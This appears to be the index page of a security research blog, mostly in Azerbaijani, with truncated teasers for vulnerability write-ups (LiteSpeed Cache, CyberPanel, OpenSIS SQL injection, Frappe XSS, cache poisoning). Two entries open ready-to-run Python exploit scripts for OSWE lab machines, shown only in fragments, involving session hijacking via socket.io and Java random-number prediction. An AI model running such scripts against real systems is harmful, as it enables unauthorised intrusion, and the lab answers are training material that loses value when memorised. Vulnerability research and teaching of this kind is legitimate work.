CVE-2024-28000 Analizi və istismarlar haqqında.
Author: Huseyn Gadashov
Məqalə xüsusi olaraq xakep.ru üçün yazılmışdır.
CVE işıq sürəti ilə. LiteSpeed Cache üçün açıq eksploiti düzəldirik
Bu gün mən LiteSpeed Cache-dəki bir zəifliyi araşdıracağam — saytların işini sürətləndirmək üçün populyar bir plagin. Bu plagin WooCommerce, bbPress, ClassicPress və Yoast kimi məşhur mühərriklərlə işləyir və bu günə qədər 5 milyondan çox qurğusu var. Gəlin baxaq, necə ki, keyfiyyətsiz təsadüfi ədədlərin yaradılması admin imtiyazlarına yüksəliş imkanına gətirib çıxarıb.
Xəbərlərdə hansısa möhtəşəm bir zəiflik yayımlandıqdan sonra, dörd tip insanı müşahidə etmək olar:…
Read more ⟶
Patch-ların pıçıldadığı boşluqlar: Cyberpanel-in bildirmədiyi boşluqların analizi
Huseyn Gadashov
Mən hər zaman bütün zəiflikləri “giriş nəzarətinin keçilməsi” adlandıran insanlarla problemlər yaşayıram. Anlayın ki, saytda SQL inyeksiyaları olması və onların vasitəsilə istifadəçi əldə etməniz və ya özünüzü admin etməniz, hərçənd girişin keçilməsi və ya imtiyazların artırılması demək olsa da, bu, giriş nəzarəti ilə bağlı zəiflik deyil. Nəhayət, developer-in giriş yoxlamasını əlavə etməyi unutduğu bir nümunə əlimizə düşdü — CVE-2024-51567.
Həmçinin (təsadüfən), bu məhsulda əvvəlcə bildirilməyən zəiflikləri aradan qaldıran patch-lar var.…
Read more ⟶
OpenSIS-də boşluqlar. Canlı nümunədən istifadə edərək SQL inyeksiyaların təhlili.
Huseyn Gadashov
Məqalənin Mündəricatı Loqlaşdırma SQL inyeksiyası haqqında bir az Autentifikasiyasız SQLi Autentifikasiyalı SQLi Məktəb Konfiqurasiyası Tələbələr İstifadəçilər Parametrlərin doğrulanması Nəticələr Bu məqalədə bir neçə SQL inyeksiyası növünü real nümunə—openSIS tətbiqi üzərində araşdıracağıq, burada mən ciddi problemlər tapdım. Əgər PHP kodunda potensial problemləri aşkar etməyi öyrənmək istəyirsənsə, bu material canlı illüstrasiya olmalıdır. Xüsusilə, SQLi mövzusunu öyrənmək istəyən yeni başlayanlar üçün faydalı olacaq.
Məlumat Əgər sən hələ SQL inyeksiyalarının necə işlədiyini bilmirsənsə, sənin üçün xüsusi olaraq “SQL-inyeksiyalar.…
Read more ⟶
CVE-lər ilə bağlı problemlər
Huseyn Gadashov
Məqalə xüsusi olaraq xakep.ru üçün yazılmışdır.
Məqalənin Mündəricatı CVE nədir? CVSS nədir? CVSS-in əsas faktorları CVE-2023-39526: PrestaShop-da “zəiflik” CVE-2023-6875: Post SMTP Mailer-də xəta Administratorun istifadəçi adı nədir? Parolu unutmuşuq Elektron poçt jurnalları Parolun dəyişdirilməsi Shell yükləmək GPT ilə bum-bum exploit Nəticələr Növbəti CVE-yə baxdığımızda ilk növbədə nəyə diqqət yetiririk? Doğrudur, təhlükə səviyyəsinə, yəni CVSS qiymətləndirməsinə. Lakin bəzən bu rəqəm real təhlükə ilə uyğun gəlmir. Bu məqalədə nümunələrlə bu cür halları göstərəcəyəm və həmçinin CVE ilə bağlı digər problemləri müzakirə edəcəyik.…
Read more ⟶
XSS at Frappe Framework [AZ | RU | EN]
Huseyn Gadashov
Azərbaycanca Kod:
def sanitize_html(html, linkify=False): """ Sanitize HTML tags, attributes and style to prevent XSS attacks Based on bleach clean, bleach whitelist and html5lib's Sanitizer defaults Does not sanitize JSON, as it could lead to future problems """ import bleach from bleach.css_sanitizer import CSSSanitizer from bs4 import BeautifulSoup if not isinstance(html, str): return html elif is_json(html): return html if not bool(BeautifulSoup(html, "html.parser").find()): return html Problem:
sanitize_html funksiyasında olan isinstance və is_json yoxlanışları html teqlərini daxil etmək üçün sui-istifadə edilə bilər.…
Read more ⟶
Top 100 OpenSource WEB Products
Huseyn Gadashov
Apache HTTP Server Download: https://httpd.apache.org/download.cgi
Nginx Download: https://nginx.org/en/download.html
WordPress GitHub: https://github.com/WordPress/WordPress
Drupal GitHub: https://github.com/drupal/drupal
Joomla! GitHub: https://github.com/joomla/joomla-cms
Magento Open Source GitHub: https://github.com/magento/magento2
MediaWiki GitHub: https://github.com/wikimedia/mediawiki
phpBB GitHub: https://github.com/phpbb/phpbb
PrestaShop GitHub: https://github.com/PrestaShop/PrestaShop
OpenCart GitHub: https://github.com/opencart/opencart
Moodle GitHub: https://github.com/moodle/moodle
Nextcloud GitHub: https://github.com/nextcloud/server
ownCloud GitHub: https://github.com/owncloud/core
Ghost GitHub: https://github.com/TryGhost/Ghost
Discourse GitHub: https://github.com/discourse/discourse
Matomo GitHub: https://github.com/matomo-org/matomo
Odoo GitHub: https://github.com/odoo/odoo
Grafana GitHub: https://github.com/grafana/grafana
Kibana GitHub: https://github.com/elastic/kibana
Elasticsearch GitHub: https://github.com/elastic/elasticsearch
GitLab Community Edition GitLab: https://gitlab.…
Read more ⟶
[SPOILER] Docedit OSWE Lab Exploit
Huseyn Gadashov
Replace values to the ones you have and you are good to go!
import random import requests import re import websockets import asyncio def getSid(url): newUrl = url + '/socket.io/?EIO=3&transport=polling&t=PBNk2-7' s = requests.get(newUrl) match = re.search(r'sid":"(.*?)","upgra', s.text, re.DOTALL) sid = match.group().replace('sid":"', '').replace('","upgra','').strip() newUrl = url + f'/socket.io/?EIO=3&transport=polling&t=PBNk31Z&sid={sid}' s = requests.get(newUrl) return sid async def register(url, sid, uname, cmd): headers = {'Cookie:' : f'io={sid}'} wsUrl = url.replace('http://', 'ws://').replace('https://', 'wss://') + f'/socket.…
Read more ⟶
[SPOILER] Answers OSWE Lab Exploit
Huseyn Gadashov
Replace values to the ones you have and you are good to go!
import time import requests import base64 import http.cookies from bs4 import BeautifulSoup from concurrent.futures import ThreadPoolExecutor import http.server import threading import random import urllib.parse import re class JavaRandom: def __init__(self, seed): self.seed = (seed ^ 0x5DEECE66D) & ((1 << 48) - 1) self.multiplier = 0x5DEECE66D self.addend = 0xB self.mask = (1 << 48) - 1 def next(self, bits): self.…
Read more ⟶
List of All Domains in the world | Bütün domenlərin siyahı | Список всех доменов [07.2024]
Hüseyn Qadaşov
https://cdn.exploit.az/index.php/s/RgHeCiBZAIb5tgt/download
Password | Parol: exploitaz…
Read more ⟶
Keş Zəhərlənməsi | Cache Poisoning
Hüseyn Qadaşov
Bloqumuzun əsas məqsədi bu sahədə Azərbaycan dilində yazılan məzmunu genişləndirməkdir. Bu məqalə həmin istiqamətdə başlanğıcdır. Məqalə digər mövzular haqda da ola bilərdi, amma istərdim ki, həm “Senior”lar, həm də “Junior”lar üçün oxunaqlı və maraqlı bir mövzu olsun. Əsas mövzu “Keş Zəhərlənməsi”dir. Biz burada “CVE-2016-2784”ü yoxlayacağıq. Bu məqalənin məqsədi təkcə “Keş Zəhərlənməsi”ni izah etmək deyil, həm də sizə “Patch-Diff"i göstərmək və başlıqların funksiyalarını daha yaxşı başa salmaqdır.
Məzmun Keş (Cache)…
Read more ⟶